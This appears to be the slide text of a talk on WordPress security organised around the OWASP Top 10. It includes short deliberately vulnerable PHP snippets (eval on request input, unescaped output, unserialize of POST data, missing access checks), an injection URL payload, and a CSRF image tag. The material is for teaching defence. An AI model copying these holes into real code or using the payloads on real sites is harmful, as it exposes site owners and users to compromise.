About me
- Currently:
- Web Developer - UF Health
- WordPress Core Contributor
- Speaker/Teacher/Blogger
- Previously:
- Senior Web Engineer - 10up
- Built Better WP Security (iThemes Security)
- Computer Science Instructor - St. Edward’s University
- Airline Captain/Musician/etc
Who identifies what is important?
The OWASP Top 10
- OWASP = Open Web Application Security Project
- Top 10 web application security risks
- Updated evey 3 years (sort of)
- Not specific to language or application (applies to them all)
- https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
The OWASP Top 10
- Deals with
- Code
- Server configuration
- General vulnerabilities
Vulnerability Targets
-
Server and application
-
User
- Targets the computer or browser of a user visiting the site
OWASP Vulnerabilities in WordPress
Major WordPress Vulnerabilities
- Sensitive Data Exposure
- Security Misconfiguration
- Injection
- Cross-site Scripting (XSS)
- Insecure Direct Object Reference
- Missing Function Level Access Control
- Cross Site Request Forgery
- Insecure Deserialization
- Using Componenets with Known Vulnerabilities
Sensitive Data Exposure
- Most common outcome of many attacks
- Failure to properly encrypt (or otherwise protect) sensitive data
Sensitive Data Exposer
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Security Misconfiguration
- A misconfiguration at any level of the stack (server/application/etc) that can lead to a
compromise
Security Misconfiguration
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure
Injection
- Injection vulnerabilities occur when the application sends untrusted data to an interpreter
Injection
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure, host pwned
Injection Code Example
$my_variable = 'variable_name;
$x = $_GET['arg'];
eval("\$my_variable = \$x;");
/index.php?arg=1; phpinfo();
Cross-Site Scripting (XSS)
- User supplied data is sent to the browser without validation
- Most common vulnerability
Cross-Site Scripting (XSS)
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Browser hijack, deface website, redirect user, etc
XSS Code Example
if ( isset( $_GET['my_secret_key'] ) ) {
echo $_GET['my_secret_key'];
}
or
__( 'Some text to translate', 'my-awesome-plugin' );
Insecure Direct Object Reference
- Use of a key or name to request an object whereas the target object does not verify the
requester's
access permission.
Insecure Direct Object Reference
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Insecure Direct Object Reference Code Example
echo esc_html( $my_wp_user->$_GET['user-key'] );
Missing Function Level Access Control
- Failure to verify access rights upon access to a specific function.
Missing Function Level Access Control
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure
Missing Function Level Access Control Code Example
if ( is_admin() ) {
echo $user_list;
}
Cross Site Request Forgery (CSRF)
- Forces a logged-on victim's browser to send a forged HTTP request to a vulnerable application.
- My include session cooke and other authentication information.
Cross Site Request Forgery (CSRF)
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure
CSRF Code Example
<img src="http://mysite.com/password=get_my_password" width="0" height="0" />
Insecure Deserialization
- Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse
the
logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary
code
upon it being deserialized.
Insecure Deserialization
-
Primary Target
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure, host pwned
Insecure Deserialization Example
unserialize( $_POST['data'] );
Using Components with Known Vulnerabilities
- Components, such as libraries, frameworks, and other software modules, run with the same
privileges as the application. If a vulnerable component is exploited, such an attack can
facilitate
serious data loss or server takeover. Applications and APIs using components with known
vulnerabilities may undermine application defenses and enable various attacks and impacts.
Using Components with Known Vulnerabilities
-
Primary Target
- User, application and Server
-
Potential risk
-
Difficulty to exploit
-
Outcomes
Data corruption, sensitive data exposure, host pwned
General Protection Strategies
Review Your WordPress Dashboard Regularly
Making Coding Standards Easier
Important WordPress Security Tools
Have (and Verify) a Backup